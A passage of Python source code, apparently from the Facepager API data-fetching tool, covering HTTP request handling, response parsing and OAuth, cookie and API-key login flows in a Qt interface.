# Send request
response = session.request(method,path, params=args, headers=headers, cookies=cookies,
data=payload, timeout=self.timeout,stream=True,verify=True) # verify=False
except (HTTPError, ConnectionError) as e:
maxretries -= 1
# Try next request with new session
if (maxretries > 0) and (self.connected):
time.sleep(0.1)
session = self.initSession(session_no, True)
self.logMessage("Automatic retry: Request Error: {0}".format(str(e)))
else:
raise e
else:
break
if int(response.headers.get('content-length',0)) > (self.maxsize * 1024 * 1024):
raise DataTooBigError(f"File is too big, content length is {response.headers['content-length']}.")
status = 'fetched' if response.ok else 'error'
status = status + ' (' + str(response.status_code) + ')'
headers = dict(list(response.headers.items()))
# Download data
data = {
'content-type': response.headers.get("content-type",""),
'sourcepath': path,'sourcequery': args,'finalurl': response.url
}
fullfilename, content = download(response, foldername, filename, fileext)
if fullfilename is not None:
data['filename'] = os.path.basename(fullfilename)
data['filepath'] = fullfilename
# Text
if format == 'text':
data['text'] = content # str(response.text)
# Scrape links
elif format == 'links':
try:
links, base = extractLinks(content, response.url)
data['links'] = links
data['base'] = base
except Exception as e:
data['error'] = 'Could not extract Links.'
data['message'] = str(e)
data['response'] = content
# JSON
elif format == 'json':
try:
data = json.loads(content) if content != '' else []
except Exception as e:
# self.logMessage("No valid JSON data, try to convert XML to JSON ("+str(e)+")")
# try:
# data = xmlToJson(response.text)
# except:
data = {
'error': 'Data could not be converted to JSON',
'response': content,
'exception':str(e)
}
# JSON
elif format == 'xml':
try:
data = xmlToJson(content)
except Exception as e:
data = {
'error': 'Data could not be converted to JSON',
'response': content,
'exception':str(e)
}
except Exception as e:
#except (DataTooBigError, HTTPError, ReadTimeout, ConnectionError, InvalidURL, MissingSchema) as e:
status = 'request error'
data = {'error':str(e)}
headers = {}
#raise Exception("Request Error: {0}".format(str(e)))
finally:
if response is not None:
response.close()
return data, headers, status
def disconnectSocket(self):
"""Used to hardly disconnect the streaming client"""
self.connected = False
while (len(self.sessions) > 0):
session = self.sessions.pop()
session.close()
#self.response.raw._fp.close()
#self.response.close()
@Slot()
def captureData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
session_no = options.get('threadnumber',0)
self.connected = True
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# file settings
foldername, filename, fileext = self.getFileFolderName(options, nodedata)
format = options.get('format', 'json')
if format == 'file':
if (foldername is None) or (not os.path.isdir(foldername)):
raise Exception("Folder does not exists, select download folder, please!")
# build url
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if not urlpath:
logMessage("Empty path, node {0} skipped.".format(nodedata['objectid']))
return False
if not urlpath.startswith(('https://','http://','file://')):
logMessage("Http or https missing in path, node {0} skipped.".format(nodedata['objectid']))
return False
if options['logrequests']:
logpath = self.getLogURL(urlpath,urlparams,options)
logMessage("Capturing data for {0} from {1}".format(nodedata['objectid'], logpath))
# Show browser
self.browserWindow = BrowserDialog(self.mainWindow, "Browser", 800, 600)
self.browserWindow.logMessage.connect(logMessage)
self.browserWindow.activateCaptureButton(logData)
url = urlpath + '?' + urllib.parse.urlencode(urlparams)
self.browserWindow.loadPage(url, requestheaders, options, foldername, filename, fileext)
# for data, headers, status in self.browserWindow.capturePage(
# session_no,urlpath, urlparams, requestheaders, method, payload,
# foldername, filename, fileext, format=format, strip):
# options['querytime'] = str(datetime.now())
# options['querystatus'] = status
# logData(data, options, headers)
return True
@Slot()
def loadFinished(self, success):
if (not success and not self.loginWindow.stopped):
self.logMessage('Error loading web page')
def selectFolder(self):
datadir = self.folderEdit.text()
datadir = os.path.dirname(self.mainWindow.settings.value('lastpath', '')) if datadir == '' else datadir
datadir = os.path.expanduser('~') if datadir == '' else datadir
dlg = SelectFolderDialog(self, 'Select Upload Folder', datadir)
if dlg.exec_():
if dlg.optionNodes.isChecked():
newnodes = [os.path.basename(f) for f in dlg.selectedFiles()]
self.mainWindow.tree.treemodel.addSeedNodes(newnodes)
folder = os.path.dirname(dlg.selectedFiles()[0])
self.folderEdit.setText(folder)
else:
folder = dlg.selectedFiles()[0]
self.folderEdit.setText(folder)
def selectDownloadFolder(self):
datadir = self.downloadfolderEdit.text()
datadir = os.path.dirname(self.mainWindow.settings.value('lastpath', '')) if datadir == '' else datadir
datadir = os.path.expanduser('~') if datadir == '' else datadir
dlg = SelectFolderDialog(self, 'Select Download Folder', datadir)
if dlg.exec_():
if dlg.optionNodes.isChecked():
newnodes = [os.path.basename(f) for f in dlg.selectedFiles()]
self.mainWindow.tree.treemodel.addSeedNodes(newnodes)
folder = os.path.dirname(dlg.selectedFiles()[0])
self.downloadfolderEdit.setText(folder)
else:
folder = dlg.selectedFiles()[0]
self.downloadfolderEdit.setText(folder)
def getGlobalOptions(self):
# Get global options
settings = {}
settings['nodelevel'] = self.mainWindow.levelEdit.value()
settings['excludetypes'] = self.mainWindow.typesEdit.text()
settings['threads'] = self.mainWindow.threadsEdit.value()
settings['speed'] = self.mainWindow.speedEdit.value()
settings['errors'] = self.mainWindow.errorEdit.value()
settings['expand'] = self.mainWindow.autoexpandCheckbox.isChecked()
settings['logrequests'] = self.mainWindow.logCheckbox.isChecked()
settings['saveheaders'] = self.mainWindow.headersCheckbox.isChecked()
settings['fulloffcut'] = self.mainWindow.offcutCheckbox.isChecked()
settings['timeout'] = self.mainWindow.timeoutEdit.value()
settings['maxsize'] = self.mainWindow.maxsizeEdit.value()
settings['allnodes'] = self.mainWindow.allnodesCheckbox.isChecked()
settings['resume'] = self.mainWindow.resumeCheckbox.isChecked()
settings['emptyonly'] = self.mainWindow.emptyCheckbox.isChecked()
return settings
def setGlobalOptions(self, settings):
value = settings.get('nodelevel', None) # default None
if value is not None:
self.mainWindow.levelEdit.setValue(int(value))
value = settings.get('excludetypes', None) # default None
if value is not None:
self.mainWindow.typesEdit.setText(str(value))
value = settings.get('threads', None) # default None
if value is not None:
self.mainWindow.threadsEdit.setValue(int(value))
value = settings.get('speed') # default 200
if value is not None:
self.mainWindow.speedEdit.setValue(int(value))
value = settings.get('errors', None) # default None
if value is not None:
self.mainWindow.errorEdit.setValue(int(value))
value = settings.get('expand', None) # default None
if value is not None:
self.mainWindow.autoexpandCheckbox.setChecked(bool(value))
value = settings.get('saveheaders', None) # default None
if value is not None:
self.mainWindow.headersCheckbox.setChecked(bool(value))
value = settings.get('fulloffcut', None) # default None
if value is not None:
self.mainWindow.offcutCheckbox.setChecked(bool(value))
value = settings.get('timeout') # default 15
if value is not None:
self.mainWindow.timeoutEdit.setValue(int(value))
value = settings.get('maxsize') # default 5
if value is not None:
self.mainWindow.maxsizeEdit.setValue(int(value))
value = settings.get('logrequests', None) # default None
if value is not None:
self.mainWindow.logCheckbox.setChecked(bool(value))
value = settings.get('allnodes', None) # default None
if value is not None:
self.mainWindow.allnodesCheckbox.setChecked(bool(value))
value = settings.get('resume', None) # default None
if value is not None:
self.mainWindow.resumeCheckbox.setChecked(bool(value))
value = settings.get('emptyonly', None) # default None
if value is not None:
self.mainWindow.emptyCheckbox.setChecked(bool(value))
class AuthTab(ApiTab):
"""
Module providing authorization
- init input fields
- login windows
- open authorization support
"""
# see YoutubeTab for keys in the options-parameter
def __init__(self, mainWindow=None, name='NoName'):
super(AuthTab, self).__init__(mainWindow, name)
self.loginServerInstance = None
self.defaults['login_buttoncaption'] = " Login "
self.defaults['login_window_caption'] = "Login Page"
self.defaults['auth_type'] = "Disable"
def cleanup(self):
if self.loginServerInstance is not None:
self.loginServerInstance.shutdown()
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0, 0, 0, 0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit = QComboBox()
self.authTypeEdit.addItems(['Disable','API key','OAuth2', 'Cookie', 'OAuth2 Client Credentials'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.authURIEdit = QLineEdit()
authlayout.addRow("Login URI", self.authURIEdit)
self.redirectURIEdit = QLineEdit()
authlayout.addRow("Redirect URI", self.redirectURIEdit)
self.tokenURIEdit = QLineEdit()
authlayout.addRow("Token URI", self.tokenURIEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Secret", self.clientSecretEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes", self.scopeEdit)
self.proxyEdit = QLineEdit()
self.proxyEdit .setToolTip(wraptip("The proxy will be used for fetching data only, not for the login procedure."))
authlayout.addRow("Proxy", self.proxyEdit)
@Slot()
def editAuthSettings(self):
dialog = QDialog(self,Qt.WindowSystemMenuHint | Qt.WindowTitleHint)
dialog.setWindowTitle("Authentication settings")
dialog.setMinimumWidth(400)
layout = QVBoxLayout()
layout.addWidget(self.authWidget)
buttons = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
layout.addWidget(buttons)
dialog.setLayout(layout)
def close():
dialog.close()
def apply():
# Auth type: 'Disable','API key','OAuth2', 'OAuth2 Client Credentials','Cookie'
try:
if self.authTypeEdit.currentText() == 'Disable':
self.authEdit.setCurrentIndex(self.authEdit.findText('disable'))
self.tokenNameEdit.setText('')
elif self.authTypeEdit.currentText() == 'API key':
pass
elif self.authTypeEdit.currentText() == 'OAuth2':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Authorization')
elif self.authTypeEdit.currentText() == 'OAuth2 Client Credentials':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Authorization')
elif self.authTypeEdit.currentText() == 'Cookie':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Cookie')
except AttributeError:
pass
dialog.close()
#connect the nested functions above to the dialog-buttons
buttons.accepted.connect(apply)
buttons.rejected.connect(close)
dialog.exec_()
def initLoginInputs(self, toggle=True):
# token and login button
loginlayout = QHBoxLayout()
if toggle:
self.authEdit = QComboBox(self)
self.authEdit.addItems(['disable', 'param', 'header'])
self.authEdit.setToolTip(wraptip(
"Disable: no authorization. Param: an access_token parameter containing the access token will be added to the query. Header: a header containing the access token will be sent."))
loginlayout.addWidget(self.authEdit)
loginlayout.addWidget(QLabel("Name"))
self.tokenNameEdit = QLineEdit()
self.tokenNameEdit.setToolTip(wraptip("The name of the access token parameter or the authorization header. If you select an authentication method different from API key (e.g. OAuth2 or Cookie), name the is overriden by the selected method."))
# If you leave this empty, the default value is 'access_token' for param-method and 'Authorization' for header-method.
loginlayout.addWidget(self.tokenNameEdit,1)
rowcaption = "Authorization"
loginlayout.addWidget(QLabel("Access token"))
else:
rowcaption = "Access token"
self.tokenEdit = QLineEdit()
self.tokenEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokenEdit,2)
self.authButton = QPushButton('Settings', self)
self.authButton.clicked.connect(self.editAuthSettings)
loginlayout.addWidget(self.authButton)
self.loginButton = QPushButton(self.defaults.get('login_buttoncaption', "Login"), self)
self.loginButton.setToolTip(wraptip(
"Sometimes you need to register your own app at the platform of the API provider. Adjust the settings and login,"))
self.loginButton.clicked.connect(self.doLogin)
loginlayout.addWidget(self.loginButton)
#self.mainLayout.addRow(rowcaption, loginwidget)
self.extraLayout.addRow(rowcaption, loginlayout)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(AuthTab, self).getSettings(purpose)
defaults = self.getDefaultAndDocOptions()
# Auth type
try:
options['auth_type'] = self.authTypeEdit.currentText().strip() if self.authTypeEdit.currentText() != "" else defaults.get('auth_type', '')
except AttributeError:
options['auth_type'] = defaults.get('auth_type', '')
# OAUTH URIs
try:
options[
'auth_uri'] = self.authURIEdit.text().strip() if self.authURIEdit.text() != "" else defaults.get(
'auth_uri', '')
options[
'redirect_uri'] = self.redirectURIEdit.text().strip() if self.redirectURIEdit.text() != "" else defaults.get(
'redirect_uri', '')
options[
'token_uri'] = self.tokenURIEdit.text().strip() if self.tokenURIEdit.text() != "" else defaults.get(
'token_uri', '')
except AttributeError:
options['auth_uri'] = defaults.get('auth_uri', '')
options['redirect_uri'] = defaults.get('redirect_uri', '')
options['token_uri'] = defaults.get('token_uri', '')
try:
options['auth'] = self.authEdit.currentText().strip() \
if self.authEdit.currentText() != "" \
else defaults.get('auth', 'disable')
options['auth_tokenname'] = self.tokenNameEdit.text()
except AttributeError:
options.pop('auth_tokenname',None)
options['auth'] = defaults.get('auth', 'disable')
# Override authorization settings (token handling)
# based on authentication settings
if options.get('auth_type') == 'OAuth2':
#options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
#options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth2 Client Credentials':
#options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
#options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth1':
#options['auth'] = 'disable' # managed by Twitter module
options['auth_prefix'] = ''
#options['auth_tokenname'] = ''
elif options.get('auth_type') == 'Cookie':
#options['auth'] = 'header'
options['auth_prefix'] = ''
#options['auth_tokenname'] = 'Cookie'
if options['auth'] == 'disable':
options['auth_prefix'] = ''
options['auth_tokenname'] = ''
return options
# Transfer options to GUI
def setSettings(self, settings = {}):
settings = super(AuthTab, self).setSettings(settings)
# Merge options
options = self.getDefaultAndDocOptions(settings)
# Legacy types
if options.get('auth_type') == 'Twitter OAuth1':
options['auth_type'] = 'OAuth1'
if options.get('auth_type') == 'Twitter App-only':
options['auth_type'] = 'OAuth2 Client Credentials'
# Override defaults
if options.get('auth_type') == 'OAuth2':
options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth2 Client Credentials':
options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth1':
options['auth'] = 'disable' # managed by Twitter module
options['auth_prefix'] = ''
options['auth_tokenname'] = ''
elif options.get('auth_type') == 'Cookie':
options['auth'] = 'header'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'Cookie'
try:
self.authTypeEdit.setCurrentIndex( \
self.authTypeEdit.findText(options.get('auth_type', 'Disable')))
self.authURIEdit.setText(options.get('auth_uri'))
self.redirectURIEdit.setText(options.get('redirect_uri'))
self.tokenURIEdit.setText(options.get('token_uri'))
except AttributeError:
pass
try:
self.authEdit.setCurrentIndex(self.authEdit.findText(options.get('auth', 'disable')))
self.tokenNameEdit.setText(options.get('auth_tokenname'))
except AttributeError:
pass
return options
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
raise Exception('You are not authorized, login please!')
session_no = options.get('threadnumber',0)
self.closeSession(session_no)
self.connected = True
self.speed = options.get('speed', None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# file settings
foldername, filename, fileext = self.getFileFolderName(options, nodedata)
format = options.get('format', 'json')
if format == 'file':
if (foldername is None) or (not os.path.isdir(foldername)):
raise Exception("Folder does not exists, select download folder, please!")
# Abort condition: maximum page count
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options['currentpage'] = page
# build url
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if not urlpath:
logMessage("Empty path, node {0} skipped.".format(nodedata['objectid']))
return False
if not urlpath.startswith(('https://','http://','file://')):
logMessage("Http or https missing in path, node {0} skipped.".format(nodedata['objectid']))
return False
if options['logrequests']:
logpath = self.getLogURL(urlpath,urlparams,options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
options['querytime'] = str(datetime.now())
data, headers, status = self.request(session_no,urlpath, urlparams, requestheaders, method, payload,
foldername, filename, fileext, format=format)
# status handling
options['querystatus'] = status
options['ratelimit'] = (status == "error (429)")
# return data
logData(data, options, headers)
# rate limit info
# if 'x-rate-limit-remaining' in headers:
# options['info'] = {'x-rate-limit-remaining': u"{} requests remaining until rate limit".format(headers['x-rate-limit-remaining'])}
# Progress
if logProgress is not None:
logProgress({'page': page + 1})
# Paging
options = self.updatePagingOptions(data, options)
if options is None:
break
if not self.connected:
break
return True
@Slot()
def doLogin(self, session_no = 0):
"""
Show login window
:param session_no: the number of the session used for login
:return:
"""
self.closeSession(session_no)
options = self.getSettings()
if options['auth_type'] == 'OAuth2 Client Credentials':
self.doTwitterAppLogin(session_no)
elif options['auth_type'] == 'OAuth1':
self.doOAuth1Login(session_no)
elif options['auth_type'] == 'Cookie':
self.doCookieLogin(session_no)
elif options['auth_type'] == 'API key':
QMessageBox.information(self, "Facepager", "Manually enter your API key into the access token field or change the authentication method in the settings.")
elif options['auth_type'] == 'Disable':
QMessageBox.information(self, "Login disabled","No authentication method selected. Please choose a method in the settings.", QMessageBox.StandardButton.Ok)
elif options['auth_type'] == 'OAuth2 External':
self.doOAuth2ExternalLogin(session_no)
else:
self.doOAuth2Login(session_no)
@Slot()
def doOAuth1Login(self, session_no = 0):
try:
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
service = self.getOAuth1Service()
self.oauthdata.pop('oauth_verifier', None)
self.oauthdata['requesttoken'], self.oauthdata[
'requesttoken_secret'] = service.get_request_token()
self.showLoginWindow(self.defaults.get('login_window_caption', 'Login'),
service.get_authorize_url(self.oauthdata['requesttoken']),
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doOAuth2Login(self, session_no=0):
try:
options = self.getSettings()
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope', None)
loginurl = options.get('auth_uri', '')
if loginurl == '':
raise Exception('Login URL is missing, please adjust settings!')
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
params = {'client_id': clientid,
'redirect_uri': options['redirect_uri'],
'response_type': options.get('response_type', 'code')}
if scope is not None:
params['scope'] = scope
#params = '&'.join('%s=%s' % (key, value) for key, value in iter(params.items()))
#url = loginurl + "?" + params
urlpath, urlparams, templateparams = self.getURL(loginurl,params,{},{})
url = urlpath + '?' + urllib.parse.urlencode(urlparams)
self.showLoginWindow(self.defaults.get('login_window_caption', 'Login'),
url,
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doOAuth2ExternalLogin(self, session_no=0):
try:
options = self.getSettings()
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope', None)
loginurl = options.get('auth_uri', '')
if loginurl == '':
raise Exception('Login URL is missing, please adjust settings!')
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
self.startLoginServer(0)
redirect_uri = "http://localhost:"+str(self.loginServerInstance.server_port)
params = {'client_id': clientid,
'redirect_uri': redirect_uri,
'response_type': options.get('response_type', 'code')}
if scope is not None:
params['scope'] = scope
params = '&'.join('%s=%s' % (key, value) for key, value in iter(params.items()))
url = loginurl + "?" + params
webbrowser.open(url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doCookieLogin(self, session_no=0):
def newCookie(domain, cookie):
self.tokenEdit.setText(cookie)
# print("Domain: "+domain+". Cookie: "+cookie)
try:
options = self.getSettings()
url= options.get('auth_uri', '')
if url == '':
raise Exception('Login URL is missing, please adjust settings!')
self.loginWindow = BrowserDialog(
self.mainWindow,
self.defaults.get('login_window_caption', 'Login'),
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
self.loginWindow.logMessage.connect(self.logMessage)
self.loginWindow.activateCookieButton(newCookie)
self.loginWindow.loadPage(url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doTwitterAppLogin(self, session_no=0):
try:
# See https://developer.twitter.com/en/docs/basics/authentication/overview/application-only
self.auth_preregistered = False
clientid = self.clientIdEdit.text() # no defaults
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
clientsecret = self.clientSecretEdit.text() # no defaults
if clientsecret == '':
raise Exception('Client Secret is missing, please adjust settings!')
options = self.getSettings()
path= options.get('auth_uri', '')
if path == '':
raise Exception('Login URL is missing, please adjust settings!')
basicauth = urllib.parse.quote_plus(clientid) + ':' + urllib.parse.quote_plus(clientsecret)
basicauth = base64.b64encode(basicauth.encode('utf-8')).decode('utf-8')
payload = 'grant_type=client_credentials'
headers = {'Authorization': 'Basic ' + basicauth,
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'}
data, headers, status = self.request(None, path, payload=payload, headers=headers, method="POST")
token = data.get('access_token', '')
self.tokenEdit.setText(token)
try:
self.tokensecretEdit.setText('')
except AttributeError:
pass
if token != '':
QMessageBox.information(self, "Login", "Login succeeded, got new access token.",
QMessageBox.StandardButton.Ok)
else:
raise Exception("Check your settings, no token could be retrieved.")
except Exception as e:
QMessageBox.critical(self, "Login failed",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def showLoginWindow(self, caption='', url='',width=600,height=600):
"""
Create a SSL-capable WebView for the login-process
Uses a Custom QT-Webpage Implementation
Supply a onLoginWindowChanged-Slot to fetch the API-Token
"""
self.loginWindow = QMainWindow(self.mainWindow)
self.loginWindow.setAttribute(Qt.WA_DeleteOnClose)
self.loginWindow.resize(width, height)
self.loginWindow.setWindowTitle(caption)
self.loginWindow.stopped = False
self.loginWindow.cookie = ''
#create WebView with Facebook log-Dialog, OpenSSL needed
self.loginStatus = self.loginWindow.statusBar()
self.login_webview = QWebEngineView(self.loginWindow)
self.loginWindow.setCentralWidget(self.login_webview)
# Use the custom- WebPage class
webpage = WebPageCustom(self.login_webview)
webpage.logMessage.connect(self.logMessage)
self.login_webview.setPage(webpage)
#Connect to the onLoginWindowChanged-method
self.login_webview.urlChanged.connect(self.onLoginWindowChanged)
webpage.urlNotFound.connect(self.onLoginWindowChanged) #catch redirects to localhost or nonexistent uris
# Connect to the loadFinished-Slot for an error message
self.login_webview.loadFinished.connect(self.loadFinished)
self.login_webview.load(QUrl(url))
self.login_webview.show()
self.loginWindow.show()
@Slot()
def closeLoginWindow(self):
if self.loginWindow is None:
return False
self.loginWindow.stopped = True
self.login_webview.stop()
self.loginWindow.close()
self.loginWindow = None
@Slot()
def onLoginWindowChanged(self, url=False):
options = self.getSettings()
if options['auth_type'] == 'OAuth2 Client Credentials':
return False
elif options['auth_type'] == 'OAuth1':
url = self.login_webview.url().toString()
success = self.getOAuth1Token(url)
if success:
self.closeLoginWindow()
else:
url = url.toString()
options = self.getSettings()
if url.startswith(options['redirect_uri']):
if self.getOAuth2Token(url):
self.closeLoginWindow()
@Slot()
def startLoginServer(self, port):
self.stopLoginServer()
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
self.loginServerInstance = LoginServer(port, self.onLoginServerRedirect)
self.loginServerThread = threading.Thread(target=self.loginServerInstance.serve_forever)
self.loginServerThread.start()
port = self.loginServerInstance.server_port
self.defaults['redirect_uri'] = 'http://localhost:%d' % port
self.logMessage('Login server listening at http://localhost:%d.' % port)
@Slot()
def stopLoginServer(self):
if self.loginServerInstance is not None:
self.loginServerInstance.shutdown()
self.logMessage('Login server stopped.')
self.loginServerInstance = None
def onLoginServerRedirect(self, path):
options = self.getSettings()
url = options['redirect_uri'] + path
if self.getOAuth2Token(url):
self.stopLoginServer()
return "https://strohne.github.io/Facepager/oauth_feedback.html"
else:
return None
@Slot()
def initSession(self, no=0, renew=False):
"""
Dispatch session initialization to specialized functions
:param no: session number
:return: session object
"""
options = self.getSettings()
if options.get('auth_type') == 'OAuth1':
return self.initOAuth1Session(no, renew)
else:
return self.initOAuth2Session(no, renew)
def initOAuth1Session(self,no=0, renew=False):
"""
Return session or create if necessary
:param no: session number
:return: session object
"""
while (len(self.sessions) <= no):
self.sessions.append(None)
session = self.sessions[no] if not renew else None
if session is None:
if (self.tokenEdit.text() == '') or (self.tokensecretEdit.text() == ''):
raise Exception("No access, login please!")
service = self.getOAuth1Service()
session = service.get_session((self.tokenEdit.text(), self.tokensecretEdit.text()))
self.sessions[no] = session
return session
def initOAuth2Session(self, no=0, renew=False):
return super(AuthTab, self).initSession(no, renew)
def getOAuth1Service(self):
if not hasattr(self,'oauthdata'):
self.oauthdata = {}
service = OAuth1Service(
consumer_key=self.defaults.get('client_id'),
consumer_secret=self.defaults.get('client_secret'),
name='oauth1',
access_token_url=self.defaults.get('access_token_url'),
authorize_url=self.defaults.get('authorize_url'),
request_token_url=self.defaults.get('request_token_url'),
base_url=self.defaults.get('basepath'))
# clientid = self.getClientId()
# if clientid is None:
# return None
service.consumer_key = self.clientIdEdit.text() if self.clientIdEdit.text() != "" else \
self.defaults['client_id']
service.consumer_secret = self.clientSecretEdit.text() if self.clientSecretEdit.text() != "" else \
self.defaults['client_secret']
service.base_url = self.basepathEdit.currentText().strip() if self.basepathEdit.currentText().strip() != "" else \
self.defaults['basepath']
if service.consumer_key == '':
raise Exception('Consumer key is missing, please adjust settings!')
if service.consumer_secret == '':
raise Exception('Consumer secret is missing, please adjust settings!')
return service
def getOAuth1Token(self, url):
success = False
url = urllib.parse.parse_qs(url)
if "oauth_verifier" in url:
token = url["oauth_verifier"]
if token:
service = self.getOAuth1Service()
self.oauthdata['oauth_verifier'] = token[0]
session = service.get_auth_session(self.oauthdata['requesttoken'],
self.oauthdata['requesttoken_secret'], method="POST",
data={'oauth_verifier': self.oauthdata['oauth_verifier']})
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(session)
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
self.tokenEdit.setText(session.access_token)
self.tokensecretEdit.setText(session.access_token_secret)
session.close()
success = True
return success
def getOAuth2Token(self, url):
success = False
try:
options = self.getSettings()
urlparsed = urlparse(url)
query = parse_qs(urlparsed.query)
if url.startswith(options['redirect_uri']) and query.get('code') is not None:
try:
clientid = self.clientIdEdit.text() if self.clientIdEdit.text() != "" \
else self.defaults.get('client_id', '')
clientsecret = self.clientSecretEdit.text() if self.clientSecretEdit.text() != "" \
else self.defaults.get('client_secret', '')
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else \
self.defaults.get('scope', None)
headers = options.get("headers",{})
headers = {key.lower(): value for (key, value) in headers.items()}
session = OAuth2Session(clientid, redirect_uri=options['redirect_uri'], scope=scope)
token = session.fetch_token(
options['token_uri'],
authorization_response=str(url),
client_secret=clientsecret,
headers=headers
)
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(token.get('access_token',''))
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
self.tokenEdit.setText(token.get('access_token',''))
try:
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
except AttributeError:
pass
success = True
finally:
session.close()
elif url.startswith(options['redirect_uri']) and query.get('error') is not None:
self.logMessage(f"Login error: {query.get('error')}")
except Exception as e:
self.logMessage(e)
return success
# Get Client ID
# return custom client ID if provided
# otherwise login to Facepager and return preregistered ID
# or return None if login fails
def getClientId(self):
if self.clientIdEdit.text() != "":
self.auth_preregistered = False
clientid = self.clientIdEdit.text()
else:
self.auth_preregistered = True
clientid = self.defaults.get('client_id', '')
if clientid == '':
raise Exception('Client ID missing, please adjust settings!')
termsurl = self.defaults.get('termsurl', '')
if termsurl != '':
proceedDlg = PreLoginWebDialog(self.mainWindow, "Login to Facepager", termsurl)
if proceedDlg.show() != QDialog.Accepted:
return None
return clientid
# Retrieves a user ID from the API that
# later is hashed for maintaining the
# anonymized user list. REimplement in the modules.
def getUserId(self):
return None
def authorizeUser(self, userid):
# User ID
if userid is None:
self.auth_userauthorized = False
return False
# App salt
salt = getDictValueOrNone(credentials,'facepager.salt')
if salt is None:
self.auth_userauthorized = False
return False
# Create token
usertoken = hashlib.pbkdf2_hmac(
'sha256', # The hash digest algorithm for HMAC
userid.encode("utf-8"),
salt.encode("utf-8"),
100000 # It is recommended to use at least 100,000 iterations of SHA-256
)
# Check token
authurl = getDictValueOrNone(credentials, 'facepager.url')
if authurl is None:
self.auth_userauthorized = False
return False
authurl += '?module='+self.name.lower()+'&usertoken='+usertoken.hex()
session = self.initOAuth2Session(0, True)
data, headers, status = self.request(0, authurl)
self.closeSession(0)
self.auth_userauthorized = status == 'fetched (200)'
return self.auth_userauthorized
class GenericTab(AuthTab):
def __init__(self, mainWindow=None):
super(GenericTab, self).__init__(mainWindow, "Generic")
#Defaults
self.timeout = 60
self.defaults['basepath'] = '<Object ID>'
# Standard inputs
self.initInputs()
# Header, Verbs
self.initHeaderInputs()
self.initVerbInputs()
self.initUploadFolderInput()
# Extract input
self.initPagingInputs(True)
self.initResponseInputs(True)
self.initFileInputs()
# Login inputs
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(GenericTab, self).getSettings(purpose)
if purpose != 'preset':
options['querytype'] = self.name + ':'+options['basepath']+options['resource']
return options
# def onSslErrors(self, reply, errors):
# url = str(reply.url().toString())
# reply.ignoreSslErrors()
# self.logmessage.emit("SSL certificate error ignored: %s (Warning: Your connection might be insecure!)" % url)
